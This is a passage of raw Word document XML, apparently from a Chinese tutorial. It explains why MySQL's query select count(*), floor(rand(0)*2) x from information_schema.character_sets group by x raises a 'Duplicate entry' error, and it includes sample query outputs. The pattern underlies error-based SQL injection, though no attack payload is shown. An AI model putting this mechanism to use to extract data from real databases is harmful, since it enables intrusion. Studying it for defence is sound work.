            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-o"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>2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x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 xml:space="preserve">from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-v"/>
              </w:rPr>
              <w:t>information_schema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character_sets</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-o"/>
              </w:rPr>
              <w:t>+---------------------+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x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-h"/>
              </w:rPr>
              <w:t xml:space="preserve">                  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+---------------------+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0.3104408553898715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   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>1.241763483026776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1.2774949104315554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0.6621841645447389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1.4784361528963188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1.4056283323146668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0.5928332643516672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0.7472813862816258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1.9579071998204172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1.5476919017244986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1.8647379706285316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0.6806142094364522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1.8088571967639562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   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>1.002443416977714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1.5856455560639924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0.9208975908541098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1.8475513475458616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0.4750640266342685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0.8326661520010477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0.7381387415697228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   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>1.192695313312761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   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>1.749060403321926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   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>1.167216138138637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0.5888995421946975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1.4428493580248667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1.4475482250075304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0.9091931124303426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0.20332094859641134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0.28902546715831895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lastRenderedPageBreak/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0.8351645514696506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1.3087464173405863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0.03823849376126984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0.2649532782518801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   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>1.210050971442881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1.2553950839260548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0.6468225667689206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1.4679276435337287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1.3991705788291717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 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>0.5920700250119623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+---------------------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>应用floor函数（取浮点数的整数部分）后，结果变成了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:r>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1040" type="#_x0000_t75" style="width:182.25pt;height:66.75pt" o:ole="">
            <v:imagedata r:id="rId17" o:title=""/>
          </v:shape>
          <w:control r:id="rId18" w:name="DefaultOcxName1" w:shapeid="_x0000_i10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6627"/>
      </w:tblGrid>
      <w:tr w:rsidR="004652F3" w:rsidTr="00465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2F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>36</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>37</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>38</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>39</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>40</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>41</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>42</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>43</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>44</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-v"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>mysql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-o"/>
              </w:rPr>
              <w:t>&gt;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>select floor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-e"/>
              </w:rPr>
              <w:t>rand</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-o"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>)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x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 xml:space="preserve">from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-v"/>
              </w:rPr>
              <w:t>information_schema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character_sets</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-o"/>
              </w:rPr>
              <w:t>+---+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x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+---+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lastRenderedPageBreak/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+---+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>39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 xml:space="preserve">rows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-st"/>
              </w:rPr>
              <w:t>in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>set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sy"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>0.00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sec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可以看到，第二行和第三行的值都是1。这也是最终引起MySQL报错Duplicate entry的地方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>实际上，我们分开执行下面的两种查询，都是不会出错的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>a) select floor(rand(0)*2) x from information_schema.character_sets group by x;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>上面的查询根据x列的值进行分组，得到：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:r>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1039" type="#_x0000_t75" style="width:182.25pt;height:66.75pt" o:ole="">
            <v:imagedata r:id="rId19" o:title=""/>
          </v:shape>
          <w:control r:id="rId20" w:name="DefaultOcxName2" w:shapeid="_x0000_i10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671"/>
      </w:tblGrid>
      <w:tr w:rsidR="004652F3" w:rsidTr="00465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2F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3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652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-o"/>
              </w:rPr>
              <w:t>+---+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x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+---+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+---+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>b) select count(*), floor(rand(0)*2) x from information_schema.character_sets;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>得到information_schema.character_sets总共有39行：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:r>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1038" type="#_x0000_t75" style="width:182.25pt;height:66.75pt" o:ole="">
            <v:imagedata r:id="rId21" o:title=""/>
          </v:shape>
          <w:control r:id="rId22" w:name="DefaultOcxName3" w:shapeid="_x0000_i103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2024"/>
      </w:tblGrid>
      <w:tr w:rsidR="004652F3" w:rsidTr="00465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2F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3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652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-o"/>
              </w:rPr>
              <w:t>+----------+---+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>count</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-o"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>)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x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+----------+---+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       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>39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+----------+---+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3"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 xml:space="preserve">row </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-st"/>
              </w:rPr>
              <w:t>in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>set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sy"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>0.00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sec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>请注意，这里x的值出现的是0。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>c) 将上述语句结合后即报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>select count(*), floor(rand(0)*2) x from information_schema.character_sets group by x;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>我们预期的结果， 其实是:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:r>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_i1037" type="#_x0000_t75" style="width:182.25pt;height:66.75pt" o:ole="">
            <v:imagedata r:id="rId23" o:title=""/>
          </v:shape>
          <w:control r:id="rId24" w:name="DefaultOcxName4" w:shapeid="_x0000_i10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2024"/>
      </w:tblGrid>
      <w:tr w:rsidR="004652F3" w:rsidTr="00465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2F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3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652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-o"/>
              </w:rPr>
              <w:t>+----------+---+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>count</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-o"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>)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x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+----------+---+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       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>18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+----------+---+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3"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       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>11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|</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-o"/>
              </w:rPr>
              <w:t>+----------+---+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>2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 xml:space="preserve">row </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-st"/>
              </w:rPr>
              <w:t>in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>set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sy"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-cn"/>
              </w:rPr>
              <w:t>0.00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sec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-sy"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>然而MySQL在内部处理中间结果的时候，出现了意外，导致报错。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C4130" w:rsidRPr="004652F3" w:rsidRDefault="001C4130" w:rsidP="004652F3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:sectPr w:rsidR="001C4130" w:rsidRPr="00465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60F" w:rsidRDefault="0045260F" w:rsidP="005006CE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0045260F" w:rsidRDefault="0045260F" w:rsidP="00500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60F" w:rsidRDefault="0045260F" w:rsidP="005006CE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0045260F" w:rsidRDefault="0045260F" w:rsidP="00500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375A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75F8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77"/>
    <w:rsid w:val="00056B95"/>
    <w:rsid w:val="000A3639"/>
    <w:rsid w:val="000A7EC0"/>
    <w:rsid w:val="001C4130"/>
    <w:rsid w:val="0045260F"/>
    <w:rsid w:val="004652F3"/>
    <w:rsid w:val="005006CE"/>
    <w:rsid w:val="00741577"/>
    <w:rsid w:val="008A4CCD"/>
    <w:rsid w:val="0090048B"/>
    <w:rsid w:val="00C9292F"/>
    <w:rsid w:val="00CC1635"/>
    <w:rsid w:val="00F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B2EB28"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FF39B942-2A41-453A-A1BC-9A2F7F60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006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2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1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56B9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00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06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0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06CE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500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006CE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005006C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1C4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413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C413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C4130"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001C4130"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-function">
    <w:name w:val="hljs-function"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001C4130"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001C4130"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001C4130"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001C4130"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004652F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652F3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="author">
    <w:name w:val="author"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="004652F3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-v">
    <w:name w:val="crayon-v"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="004652F3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-o">
    <w:name w:val="crayon-o"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="004652F3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-h">
    <w:name w:val="crayon-h"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="004652F3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-e">
    <w:name w:val="crayon-e"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="004652F3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-sy">
    <w:name w:val="crayon-sy"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="004652F3"/>
